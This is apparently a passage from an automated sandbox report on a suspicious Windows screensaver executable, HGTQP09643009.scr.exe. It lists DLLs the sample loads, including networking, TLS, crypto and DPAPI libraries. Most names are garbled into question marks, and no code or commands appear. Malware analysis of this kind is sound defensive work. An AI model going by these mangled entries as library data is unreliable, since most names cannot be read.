                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???y.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???y.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???y.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???2.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???2.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???2.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??????s.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??????s?s.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??????s.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: winhttpcom.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ???.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ??l.dllJump to behavior
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeSection loaded: ????.dllJump to behavior
